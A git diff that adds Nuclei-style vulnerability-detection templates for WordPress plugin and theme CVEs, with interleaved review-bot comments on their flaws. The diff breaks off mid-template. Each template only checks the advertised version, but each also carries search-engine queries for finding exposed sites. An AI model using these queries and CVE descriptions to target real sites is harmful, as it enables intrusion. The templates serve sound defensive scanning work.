diff --git a/poc/cve/CVE-2024-10692-c75c741c420e4c515c59f2646be4e222.yaml b/poc/cve/CVE-2024-10692-c75c741c420e4c515c59f2646be4e222.yaml
new file mode 100644
index 0000000000..48ca65f1e2
--- /dev/null
+++ b/poc/cve/CVE-2024-10692-c75c741c420e4c515c59f2646be4e222.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10692-c75c741c420e4c515c59f2646be4e222
+
+info:
+ name: >
+ PowerPack Elementor Addons (Free Widgets, Extensions and Templates) <= 2.8.1 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+ The PowerPack Elementor Addons (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.8.1 via the Content Reveal widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d073d9df-0636-4884-b5d0-e2da779e5edf?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-10692
+ metadata:
+ fofa-query: "wp-content/plugins/powerpack-lite-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/powerpack-lite-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-10692'
+ tags: cve,wordpress,wp-plugin,powerpack-lite-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/powerpack-lite-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "powerpack-lite-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10777.yaml b/poc/cve/CVE-2024-10777.yaml
new file mode 100644
index 0000000000..257b0a607b
--- /dev/null
+++ b/poc/cve/CVE-2024-10777.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10777
+
+info:
+ name: >
+ AnyWhere Elementor <= 1.2.11 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+ The AnyWhere Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.11 via the 'INSERT_ELEMENTOR' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2138634-c149-4fd1-a33d-351bbf633ea3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-10777
+ metadata:
+ fofa-query: "wp-content/plugins/anywhere-elementor/"
+ google-query: inurl:"/wp-content/plugins/anywhere-elementor/"
+ shodan-query: 'vuln:CVE-2024-10777'
+ tags: cve,wordpress,wp-plugin,anywhere-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/anywhere-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "anywhere-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.11')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10836-e5372e893ae8325e3b297cc93a19837f.yaml b/poc/cve/CVE-2024-10836-e5372e893ae8325e3b297cc93a19837f.yaml
new file mode 100644
index 0000000000..0e3961dc66
--- /dev/null
+++ b/poc/cve/CVE-2024-10836-e5372e893ae8325e3b297cc93a19837f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10836-e5372e893ae8325e3b297cc93a19837f
+
+info:
+ name: >
+ Flixita <= 1.0.82 - Reflected Cross-Site Scripting via id Parameter
+ author: topscoder
+ severity: medium
+ description: >
+ The Flixita theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘id’ parameter in all versions up to, and including, 1.0.82 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/131b5d57-2af1-4cc5-8b4e-019a050c3bb8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-10836
+ metadata:
+ fofa-query: "wp-content/themes/flixita/"
+ google-query: inurl:"/wp-content/themes/flixita/"
+ shodan-query: 'vuln:CVE-2024-10836'
+ tags: cve,wordpress,wp-theme,flixita,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/flixita/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "flixita"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.82')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10848.yaml b/poc/cve/CVE-2024-10848.yaml
new file mode 100644
index 0000000000..928bde3531
--- /dev/null
+++ b/poc/cve/CVE-2024-10848.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10848
+
+info:
+ name: >
+ NewsMunch <= 1.0.35 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The NewsMunch theme for WordPress is vulnerable to Stored Cross-Site Scripting via a malicious display name in all versions up to, and including, 1.0.35 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1a2b0ff4-9471-4fd0-ac1a-ed5b7b4af4ff?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10848
+ metadata:
+ fofa-query: "wp-content/themes/newsmunch/"
+ google-query: inurl:"/wp-content/themes/newsmunch/"
+ shodan-query: 'vuln:CVE-2024-10848'
+ tags: cve,wordpress,wp-theme,newsmunch,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/newsmunch/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "newsmunch"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.35')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10849-c4f62162d556d3b337dc88f33abf0608.yaml b/poc/cve/CVE-2024-10849-c4f62162d556d3b337dc88f33abf0608.yaml
new file mode 100644
index 0000000000..86e70fcd78
--- /dev/null
+++ b/poc/cve/CVE-2024-10849-c4f62162d556d3b337dc88f33abf0608.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10849-c4f62162d556d3b337dc88f33abf0608
+
+info:
+ name: >
+ NewsMash <= 1.0.71 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The NewsMash theme for WordPress is vulnerable to Stored Cross-Site Scripting via a malicious display name in all versions up to, and including, 1.0.71 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bb30dac-e0f3-43dd-a20d-9af6c7af3cb4?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10849
+ metadata:
+ fofa-query: "wp-content/themes/newsmash/"
+ google-query: inurl:"/wp-content/themes/newsmash/"
+ shodan-query: 'vuln:CVE-2024-10849'
+ tags: cve,wordpress,wp-theme,newsmash,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/newsmash/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "newsmash"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.71')
\ No newline at end of file
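Review bot: The two entries under `extractors` are identical except for `internal: true`, and both are named `version`, so the same regex runs twice over the body and the name is bound twice with nothing explaining why. A comment above the first entry would make the intent readable, for example `# internal copy feeds compare_versions(); the second copy only prints the version in the result`. Giving the reporting extractor a different name would also work. Every template added in this commit repeats the pattern.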
diff --git a/poc/cve/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml b/poc/cve/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml
new file mode 100644
index 0000000000..44f464f0ce
--- /dev/null
+++ b/poc/cve/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e
+
+info:
+ name: >
+ Quotes llama <= 3.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Quotes llama plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'quotes-llama' shortcode in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e2f3abd-0a15-4bc1-966a-22d606f3e333?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10874
+ metadata:
+ fofa-query: "wp-content/plugins/quotes-llama/"
+ google-query: inurl:"/wp-content/plugins/quotes-llama/"
+ shodan-query: 'vuln:CVE-2024-10874'
+ tags: cve,wordpress,wp-plugin,quotes-llama,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/quotes-llama/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "quotes-llama"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.0')
\ No newline at end of file
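Review bot: The `dsl` matcher decides solely on the `Stable tag` line of `readme.txt`, which is what the readme advertises and not necessarily the code that is installed. Because the capture group is `([0-9.]+)`, a readme carrying `Stable tag: trunk` yields no version, and a removed or blocked readme gives no result at all, so an outdated install can go unreported. A hit therefore means "advertised version is in the affected range", not that the shortcode issue is reachable on the site. I would state this in the template, e.g. `# version-only check: reports the advertised Stable tag, does not confirm the vulnerability`, so that both hits and clean results are triaged accordingly. The other plugin templates in this commit share the limitation.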
diff --git a/poc/cve/CVE-2024-10879-fdafc38df20050c33f2864a1f7138f44.yaml b/poc/cve/CVE-2024-10879-fdafc38df20050c33f2864a1f7138f44.yaml
new file mode 100644
index 0000000000..b90e223913
--- /dev/null
+++ b/poc/cve/CVE-2024-10879-fdafc38df20050c33f2864a1f7138f44.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10879-fdafc38df20050c33f2864a1f7138f44
+
+info:
+ name: >
+ ForumWP – Forum & Discussion Board <= 2.1.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The ForumWP – Forum & Discussion Board plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/10b3256b-5271-44b8-ab4d-05156d4f674b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-10879
+ metadata:
+ fofa-query: "wp-content/plugins/forumwp/"
+ google-query: inurl:"/wp-content/plugins/forumwp/"
+ shodan-query: 'vuln:CVE-2024-10879'
+ tags: cve,wordpress,wp-plugin,forumwp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forumwp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "forumwp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.2')
\ No newline at end of file
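Review bot: This template and the one added for CVE-2024-11204 send the same request (`{{BaseURL}}/wp-content/plugins/forumwp/readme.txt`) and apply the same `compare_versions(version, '<= 2.1.2')` check, so one outdated ForumWP install produces two findings from a single piece of evidence. Neither template distinguishes the `add_query_arg` issue from the `url` parameter issue. A cross-reference comment in each would help triage, for example `# same probe and version bound as CVE-2024-11204; both are resolved by the same upgrade`.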
diff --git a/poc/cve/CVE-2024-10881.yaml b/poc/cve/CVE-2024-10881.yaml
new file mode 100644
index 0000000000..4562f976ea
--- /dev/null
+++ b/poc/cve/CVE-2024-10881.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10881
+
+info:
+ name: >
+ LUNA RADIO PLAYER <= 6.24.11.07 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The LUNA RADIO PLAYER plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lunaradio' shortcode in versions up to, and including, 6.24.11.07 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ed8a7f8-1af3-4b41-bfaf-fd1c35baa867?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10881
+ metadata:
+ fofa-query: "wp-content/plugins/lu-radioplayer/"
+ google-query: inurl:"/wp-content/plugins/lu-radioplayer/"
+ shodan-query: 'vuln:CVE-2024-10881'
+ tags: cve,wordpress,wp-plugin,lu-radioplayer,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lu-radioplayer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lu-radioplayer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.24.11.07')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10909-308c66fb506ba01c372d73eaeb9b223a.yaml b/poc/cve/CVE-2024-10909-308c66fb506ba01c372d73eaeb9b223a.yaml
new file mode 100644
index 0000000000..290d988de5
--- /dev/null
+++ b/poc/cve/CVE-2024-10909-308c66fb506ba01c372d73eaeb9b223a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10909-308c66fb506ba01c372d73eaeb9b223a
+
+info:
+ name: >
+ Pojo Forms <= 1.4.7 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via form_preview_shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The The Pojo Forms plugin for WordPress is vulnerable to arbitrary shortcode execution via form_preview_shortcode AJAX action in all versions up to, and including, 1.4.7. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. This was partially fixed in version 1.4.8.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/511ce6f6-aea3-4c37-8312-d6e5ff2fdf6f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 6.3
+ cve-id: CVE-2024-10909
+ metadata:
+ fofa-query: "wp-content/plugins/pojo-forms/"
+ google-query: inurl:"/wp-content/plugins/pojo-forms/"
+ shodan-query: 'vuln:CVE-2024-10909'
+ tags: cve,wordpress,wp-plugin,pojo-forms,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pojo-forms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pojo-forms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.7')
\ No newline at end of file
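Review bot: The description says the issue was only partially fixed in 1.4.8, yet `compare_versions(version, '<= 1.4.7')` treats 1.4.8 as unaffected, so a clean result can be read as fully remediated. If the bound is intentional, a comment next to the matcher would record that, e.g. `# 1.4.8 carries a partial fix only (per advisory); this template does not flag it`. Separately, the description opens with a doubled word, `The The Pojo Forms`.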
diff --git a/poc/cve/CVE-2024-10937.yaml b/poc/cve/CVE-2024-10937.yaml
new file mode 100644
index 0000000000..39f06ec706
--- /dev/null
+++ b/poc/cve/CVE-2024-10937.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10937
+
+info:
+ name: >
+ Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins <= 2.0.58 - Sensitive Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.58 via the wp_ajax_nopriv_related_post_ajax_get_post_ids AJAX action. This makes it possible for unauthenticated attackers to extract sensitive data including titles of posts in draft status.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/85f7c69d-0b48-47af-9451-3cfd4326ffe5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-10937
+ metadata:
+ fofa-query: "wp-content/plugins/related-post/"
+ google-query: inurl:"/wp-content/plugins/related-post/"
+ shodan-query: 'vuln:CVE-2024-10937'
+ tags: cve,wordpress,wp-plugin,related-post,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/related-post/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "related-post"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.58')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10961-60fb90d65f9868b90bab1ea437eb89b3.yaml b/poc/cve/CVE-2024-10961-60fb90d65f9868b90bab1ea437eb89b3.yaml
new file mode 100644
index 0000000000..640498730a
--- /dev/null
+++ b/poc/cve/CVE-2024-10961-60fb90d65f9868b90bab1ea437eb89b3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10961-60fb90d65f9868b90bab1ea437eb89b3
+
+info:
+ name: >
+ Social Login <= 5.9.0 - Authentication Bypass
+ author: topscoder
+ severity: critical
+ description: >
+ The Social Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.9.0. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/43a64074-ca64-4c34-b467-06d1ad8c5aa0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-10961
+ metadata:
+ fofa-query: "wp-content/plugins/oa-social-login/"
+ google-query: inurl:"/wp-content/plugins/oa-social-login/"
+ shodan-query: 'vuln:CVE-2024-10961'
+ tags: cve,wordpress,wp-plugin,oa-social-login,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/oa-social-login/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "oa-social-login"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.9.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml b/poc/cve/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
new file mode 100644
index 0000000000..8a3dda0de2
--- /dev/null
+++ b/poc/cve/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db
+
+info:
+ name: >
+ Login With OTP <= 1.4.2 - Authentication Bypass via Weak OTP
+ author: topscoder
+ severity: critical
+ description: >
+ The Login With OTP plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.4.2. This is due to the plugin generating too weak OTP, and there’s no attempt or time limit. This makes it possible for unauthenticated attackers to generate and brute force the 6-digit numeric OTP that makes it possible to log in as any existing user on the site, such as an administrator, if they have access to the email.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3775d48-5985-475e-8fb9-c4c5fd044772?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-11178
+ metadata:
+ fofa-query: "wp-content/plugins/otp-login/"
+ google-query: inurl:"/wp-content/plugins/otp-login/"
+ shodan-query: 'vuln:CVE-2024-11178'
+ tags: cve,wordpress,wp-plugin,otp-login,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/otp-login/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "otp-login"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml b/poc/cve/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml
new file mode 100644
index 0000000000..4f40bc9c2f
--- /dev/null
+++ b/poc/cve/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19
+
+info:
+ name: >
+ myCred – Loyalty Points and Rewards plugin <= 2.7.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via mycred_send Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The myCred – Loyalty Points and Rewards plugin for WordPress and WooCommerce – Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mycred_send shortcode in all versions up to, and including, 2.7.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11201
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:CVE-2024-11201'
+ tags: cve,wordpress,wp-plugin,mycred,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.5.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11204-f87aa22c9bcd426fec72b8003f96482e.yaml b/poc/cve/CVE-2024-11204-f87aa22c9bcd426fec72b8003f96482e.yaml
new file mode 100644
index 0000000000..b1dea3a88b
--- /dev/null
+++ b/poc/cve/CVE-2024-11204-f87aa22c9bcd426fec72b8003f96482e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11204-f87aa22c9bcd426fec72b8003f96482e
+
+info:
+ name: >
+ ForumWP – Forum & Discussion Board <= 2.1.2 - Reflected Cross-Site Scripting via url Parameter
+ author: topscoder
+ severity: medium
+ description: >
